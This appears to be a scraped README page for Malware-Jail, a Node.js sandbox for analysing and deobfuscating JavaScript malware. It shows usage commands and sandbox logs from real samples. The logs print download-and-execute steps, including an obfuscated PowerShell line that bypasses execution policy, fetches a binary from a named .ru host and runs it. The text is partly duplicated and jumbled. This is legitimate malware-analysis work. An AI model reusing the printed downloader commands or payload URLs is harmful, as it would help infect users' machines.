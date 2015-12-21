

Malware-Jail is a sandbox for semi-automatic Javascript malware analysis, deobfuscation and payload extraction. It is written for Node.js. Malware-Jail is a sandbox for semi-automatic Javascript malware analysis, deobfuscation and payload extraction. It is written for Node.js.

It runs on any operating system. Developed and tested on Linux, Node.js v6.6.0.





Note : Due to use of some ES6 features, you'll need Node.js >= 6.x.

Node's 'vm' sandbox . Currently implements WScript (Windows Scripting Host) context env/wscript.js , at least the part frequently used by malware. Internet browser context is partialy implemented env/browser.js .



Malware-Jail is written for. Currently implements WScript (Windows Scripting Host) context, at least the part frequently used by malware. Internet browser context is partialy implemented

How To Install Malware-Jail

Pull from GitHub

git clone https://github.com/HynekPetrak/malware-jail.git cd malware-jail

npm install

Usage

bash@linux# node jailme.js -h -b list 7 May 20:54:52 - mailware-jail, a malware sandbox ver. 0.19 7 May 20:54:52 - ------------------------ 7 May 20:54:52 - Usage: node jailme.js [[-e file1] [-e file2] .. ] [-c ./config.json] \ 7 May 20:54:52 - [-o ofile] [-b id] \ 7 May 20:54:52 - [-s odir] [--down] [malware1 [malware2] .. ] 7 May 20:54:52 - -c config .. use alternative config file, preceed with ./ 7 May 20:54:52 - -e ifile ... js that simulates specific environment 7 May 20:54:52 - -o ofile ... name of the file where sandbox shall be dumped at the end 7 May 20:54:52 - -s odir ... output directory for generated files (malware payload) 7 May 20:54:52 - -b id ... browser type, use -b list for possible values 7 May 20:54:52 - -t msecs ... number of miliseconds before terminating execution, default 1 minute 7 May 20:54:52 - --trace ... print stack trace with every log line 7 May 20:54:52 - --down ... allow downloading malware payloads from remote servers 7 May 20:54:52 - --h404 ... on download return always HTTP/404 7 May 20:54:52 - malware ... js with the malware code 7 May 20:54:52 - If no arguments are specified the default values are taken from config.json 7 May 20:54:52 - Possible -b values: [ 'IE11_W10', 'IE8', 'IE7', 'iPhone', 'Firefox', 'Chrome' ]

node jailme.js -c ./config_wscript_only.json --down=y malware/example.js

node jailme.js -b IE11_W10 malware/example_browser.js

At the end of the analysis the complete sandbox context is dumped into a 'sandbox_dump_after.json' file.





You may want to examine following entries of 'sandbox_dump_after.json':

eval_calls - array of all eval() calls arguments. Useful if eval() is used for deobfucation.

- array of all eval() calls arguments. Useful if eval() is used for deobfucation. wscript_saved_files - content of all files that the malware attempted to drop. The actual files are saved into the output/ directory too.

- content of all files that the malware attempted to drop. The actual files are saved into the output/ directory too. wscript_urls - all URLs that the malware intended to GET or POST.

- all URLs that the malware intended to GET or POST. wscript_objects - WScript or ActiveX objects created.

Sample Output

bash@linux# node jailme.js malware/example.js 11 Jan 00:06:24 - Malware sandbox ver. 0.2 11 Jan 00:06:24 - ------------------------ 11 Jan 00:06:24 - Sandbox environment sequence: env/eval.js,env/wscript.js 11 Jan 00:06:24 - Malware files: malware/example.js 11 Jan 00:06:24 - Output file for sandbox dump: sandbox_dump_after.json 11 Jan 00:06:24 - Output directory for generated files: output/ 11 Jan 00:06:24 - ==> Preparing Sandbox environment. 11 Jan 00:06:24 - => Executing: env/eval.js 11 Jan 00:06:24 - Preparing sandbox to intercept eval() calls. 11 Jan 00:06:24 - => Executing: env/wscript.js 11 Jan 00:06:24 - Preparing sandbox to emulate WScript environment. 11 Jan 00:06:24 - ==> Executing malware file(s). 11 Jan 00:06:24 - => Executing: malware/example.js 11 Jan 00:06:24 - ActiveXObject(WScript.Shell) 11 Jan 00:06:24 - Created: WScript.Shell[1] 11 Jan 00:06:24 - WScript.Shell[1].ExpandEnvironmentStrings(%TEMP%) 11 Jan 00:06:24 - ActiveXObject(MSXML2.XMLHTTP) 11 Jan 00:06:24 - Created: MSXML2.XMLHTTP[2] 11 Jan 00:06:24 - MSXML2.XMLHTTP[2].open(POST,http://EXAMPLE.COM/redir.php,false) 11 Jan 00:06:24 - MSXML2.XMLHTTP[2].setRequestHeader(Content-Type, application/x-www-form-urlencoded) 11 Jan 00:06:24 - MSXML2.XMLHTTP[2].send(iTlOlnxhMXnM=0.588860877091065&jndj=IT0601) 11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Not sending data, if you want to interract with remote server, set --down=y 11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Calling onreadystatechange() with dummy data 11 Jan 00:06:24 - ActiveXObject(ADODB.Stream) 11 Jan 00:06:24 - Created: ADODB_Stream[3] 11 Jan 00:06:24 - ADODB_Stream[3].Open() 11 Jan 00:06:24 - ADODB_Stream[3].Write(str) - 10001 bytes 11 Jan 00:06:24 - ADODB_Stream[3].SaveToFile(%TEMP%\57020551.dll, 2) 11 Jan 00:06:24 - WScript.Shell[1].Exec(rundll32 %TEMP%\57020551.dll, DllRegisterServer) 11 Jan 00:06:24 - ADODB_Stream[3].Close() 11 Jan 00:08:42 - ==> Script execution finished, dumping sandbox environment to a file. 11 Jan 00:08:42 - Saving: output/_TEMP__49629482.dll 11 Jan 00:08:42 - Saving: output/_TEMP__38611354.pdf 11 Jan 00:08:42 - Generated file saved 11 Jan 00:08:42 - Generated file saved 11 Jan 00:08:42 - The sandbox context has been saved to: sandbox_dump_after.json

In the above example the payload has been extracted into output/_TEMP__49629482.dll and output/_TEMP__38611354.pdf

Examples

malware folder contains real-world malware samples. Most of them downloaded from https://malwr.com . Thefolder contains real-world malware samples. Most of them downloaded from







Example: Analysing Wileen.js

Wileen.js Taking malicious script from malwr.com:







if (typeof document == "undefined") {

Therefore you may want to use an alternate config filem which does not load browser/DOM components:

node jailme.js --down=y -c ./config_wscript_only.json malware/20161001/a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.js

Interesting use of Powershell:

1 Oct 13:05:34 - => Executing: malware/20161001/a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.js 1 Oct 13:05:34 - ActiveXObject(WScRipT.SHEll) 1 Oct 13:05:34 - Created: WScript.Shell[1] 1 Oct 13:05:34 - WScript.Shell[1].Run(cmD.EXE /c POWE^R^s^he^lL.eXE -ExEc^U^Tio^n^p^oLIC^y^ B^Y^pas^S -NOpro^Fi^L^e^ -^W^InD^Ow^sT^yle^ HI^ddeN^ (^Ne^W^-^OBJ^ecT^ S^YST^EM.net.Webc^L^I^E^n^T^).^dOWn^L^Oa^d^fI^lE^(^'http://click.doubledating.ru/js/boxun4.bin','%appdatA%.exE')^;^stA^Rt-^p^rO^c^eS^s ^'%aPpdata%.eXe', false, undefined) 1 Oct 13:05:34 - ==> Cleaning up sandbox. 1 Oct 13:05:34 - ==> Script execution finished, dumping sandbox environment to a file. 1 Oct 13:05:34 - The sandbox context has been saved to: sandbox_dump_after.json



Apparently the malware does not execute if run from within a browser:Therefore you may want to use an alternate config filem which does not load browser/DOM components:Interesting use of Powershell:

Example: Analysing ORDER-10455.js Taking malicious JavaScript from malwr.com: ORDER-10455.js



First run without interaction with remote servers: Taking malicious JavaScript from malwr.com:First run without interaction with remote servers:

node jailme.js malware/20160929/416e32e1b22ecb8f360ff841b87d77ac9450fda24458ce4e70abb35ff4d242a3.js

... 29 Sep 23:17:21 - Calling eval() no.: 5 29 Sep 23:17:21 - ActiveXObject(MSXML2.XMLHTTP) 29 Sep 23:17:21 - Created: MSXML2.XMLHTTP[9] 29 Sep 23:17:21 - MSXML2.XMLHTTP[9].open(GET,http://caopdjow.top/user.php?f=0.dat,false) 29 Sep 23:17:21 - MSXML2.XMLHTTP[9].send(undefined) 29 Sep 23:17:21 - MSXML2.XMLHTTP[9] Not sending data, if you want to interact with remote server, set --down=y 29 Sep 23:17:21 - MSXML2.XMLHTTP[9].responseBody = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ... (truncated)' 29 Sep 23:17:21 - MSXML2.XMLHTTP[9].status = '200' 29 Sep 23:17:21 - MSXML2.XMLHTTP[9].send(undefined) finished 29 Sep 23:17:21 - MSXML2.XMLHTTP[9].status.get() => 200 29 Sep 23:17:21 - MSXML2.XMLHTTP[9].ResponseBody.get() => aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ... (truncated) 29 Sep 23:17:21 - ActiveXObject(Scripting.FileSystemObject) 29 Sep 23:17:21 - Scripting.FileSystemObject[10] created. 29 Sep 23:17:21 - Scripting.FileSystemObject[10].GetSpecialFolder(2) 29 Sep 23:17:21 - ActiveXObject(ADODB.Stream) 29 Sep 23:17:21 - Created: ADODB_Stream[11] 29 Sep 23:17:21 - ADODB_Stream[11].Open() 29 Sep 23:17:21 - ADODB_Stream[11].Type = '1' 29 Sep 23:17:21 - ADODB_Stream[11].content = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ... (truncated)' 29 Sep 23:17:21 - ADODB_Stream[11].Write(str) - 10000 bytes 29 Sep 23:17:21 - ADODB_Stream[11].size = '10000' 29 Sep 23:17:21 - ADODB_Stream[11].Position = '0' 29 Sep 23:17:21 - ADODB_Stream[11].SaveToFile(Special_Folder__2\w8z05i7y2.exe, 2) 29 Sep 23:17:21 - ADODB_Stream[11].content.get() => aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ... (truncated) 29 Sep 23:17:21 - ADODB_Stream[11].Close() 29 Sep 23:17:21 - ActiveXObject(WScript.Shell) 29 Sep 23:17:21 - Created: WScript.Shell[12] 29 Sep 23:17:21 - WScript.Shell[12].Run(Special_Folder__2\w8z05i7y2.exe, undefined, undefined) 29 Sep 23:17:21 - Returning: 'undefined' 29 Sep 23:17:21 - ==> Cleaning up sandbox. 29 Sep 23:17:21 - ==> Script execution finished, dumping sandbox environment to a file. 29 Sep 23:17:21 - MSXML2.XMLHTTP[9].ResponseBody.get() => aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ... (truncated) 29 Sep 23:17:21 - Saving: output/Special_Folder__2_w8z05i7y2.exe 29 Sep 23:17:21 - Generated file saved 29 Sep 23:17:21 - The sandbox context has been saved to: sandbox_dump_after.json









If we want to get the real payload, run it with '--down=y':

node jailme.js --down=y malware/20160929/416e32e1b22ecb8f360ff841b87d77ac9450fda24458ce4e70abb35ff4d242a3.js > malware/20160929/416e32e1b22ecb8f360ff841b87d77ac9450fda24458ce4e70abb35ff4d242a3.out

Seems to be a "standard" behaviour of deobfuscation in order to finally download an exe binary and execute it.If we want to get the real payload, run it with '--down=y':



Example: Analysing Norri.js

Norri.js



Run:

node jailme.js --down=y malware/20160929/cb7fc381f6f7600ca0060764ae117482cae3a0fa02db4467604a55c57d069124.js

you get: Taking malicious JavaScript from malwr.com:Run:you get:

30 Sep 01:02:11 - => Executing: malware/20160929/cb7fc381f6f7600ca0060764ae117482cae3a0fa02db4467604a55c57d069124.js 30 Sep 01:02:11 - Strict mode: false 30 Sep 01:02:11 - Calling eval() no.: 1 30 Sep 01:02:11 - WScript.CreateObject(WScript.Shell) 30 Sep 01:02:11 - Created: WScript.Shell[9] 30 Sep 01:02:11 - WScript.SpecialFolders(Desktop) 30 Sep 01:02:11 - WScript.CreateShortcut(Desktop/?eno.lnk) 30 Sep 01:02:11 - Created: WshShortcut[10](Desktop/?eno.lnk) 30 Sep 01:02:11 - WshShortcut[10](Desktop/?eno.lnk).FullName.get() => Desktop/?eno.lnk 30 Sep 01:02:11 - WScript.CreateObject(Scripting.FileSystemObject) 30 Sep 01:02:11 - Scripting.FileSystemObject[11] created. 30 Sep 01:02:11 - WScript.CreateObject(WScript.Shell) 30 Sep 01:02:11 - Created: WScript.Shell[12] 30 Sep 01:02:11 - WScript.CreateObject(MSXML2.XMLHTTP) 30 Sep 01:02:11 - Created: MSXML2.XMLHTTP[13] 30 Sep 01:02:11 - WScript.CreateObject(ADODB.Stream) 30 Sep 01:02:11 - Created: ADODB_Stream[14] 30 Sep 01:02:11 - Scripting.FileSystemObject[11].GetSpecialFolder(2) => TemporaryFolder/ 30 Sep 01:02:11 - Scripting.FileSystemObject[11].GetTempName() => TempFile[15] 30 Sep 01:02:11 - MSXML2.XMLHTTP[13].open(GET,http://girlx.tornadodating.ru/js/boxun4.bin,0) 30 Sep 01:02:11 - MSXML2.XMLHTTP[13] string true 30 Sep 01:02:11 - MSXML2.XMLHTTP[13].async = 'false' 30 Sep 01:02:11 - MSXML2.XMLHTTP[13].async.get() => false 30 Sep 01:02:11 - MSXML2.XMLHTTP[13].send(undefined) 30 Sep 01:02:15 - MSXML2.XMLHTTP[13].onreadystatechange(), readyState = 4 length: 196608 status: 200 30 Sep 01:02:15 - MSXML2.XMLHTTP[13] statusText = null 30 Sep 01:02:15 - MSXML2.XMLHTTP[13].responseBody = 'MZ?@?!?L?!This program cannot be ... (truncated)' 30 Sep 01:02:15 - MSXML2.XMLHTTP[13].status = '200' 30 Sep 01:02:15 - MSXML2.XMLHTTP[13].onreadystatechange() undefined 30 Sep 01:02:15 - MSXML2.XMLHTTP[13].send(undefined) finished 30 Sep 01:02:15 - ADODB_Stream[14].type = '1' 30 Sep 01:02:15 - MSXML2.XMLHTTP[13].ResponseBody.get() => MZ?@?!?L?!This program cannot be ... (truncated) 30 Sep 01:02:15 - ADODB_Stream[14].Open() 30 Sep 01:02:15 - ADODB_Stream[14].content = 'MZ?@?!?L?!This program cannot be ... (truncated)' 30 Sep 01:02:15 - ADODB_Stream[14].Write(str) - 196608 bytes 30 Sep 01:02:15 - ADODB_Stream[14].size = '196608' 30 Sep 01:02:15 - ADODB_Stream[14].SaveToFile(TemporaryFolder/TempFile[15], undefined) 30 Sep 01:02:15 - ADODB_Stream[14].content.get() => MZ?@?!?L?!This program cannot be ... (truncated) 30 Sep 01:02:15 - ADODB_Stream[14].Close() 30 Sep 01:02:15 - WScript.Shell[12].Run(cmd.exe /c TemporaryFolder/TempFile[15], 0, undefined) 30 Sep 01:02:15 - Scripting.FileSystemObject[11].DeleteFile(script_full_name.js) 30 Sep 01:02:15 - ==> Cleaning up sandbox. 30 Sep 01:02:15 - ==> Script execution finished, dumping sandbox environment to a file. 30 Sep 01:02:15 - MSXML2.XMLHTTP[13].ResponseBody.get() => MZ?@?!?L?!This program cannot be ... (truncated) 30 Sep 01:02:16 - Saving: output/TemporaryFolder_TempFile[15] 30 Sep 01:02:16 - Generated file saved 30 Sep 01:02:16 - The sandbox context has been saved to: sandbox_dump_after.json

Behaviour is obvious from the log. Payload has been extracted into the output/TemporaryFolder_TempFile[15] file.









You'll need Node.js and npm installed. Because malware-jail is built on top of minimist, iconv-lite and entities.Then install all the dependecies (minimist, entities, iconv-lite) with:In the examples folder you may find a deactivated malware file. Run the analysis with:Internet browser based malware you may test with' uses JSONPath, implemented by JSON-js/cycle.js, to save duplicated or cyclic references to a same object.you get something like: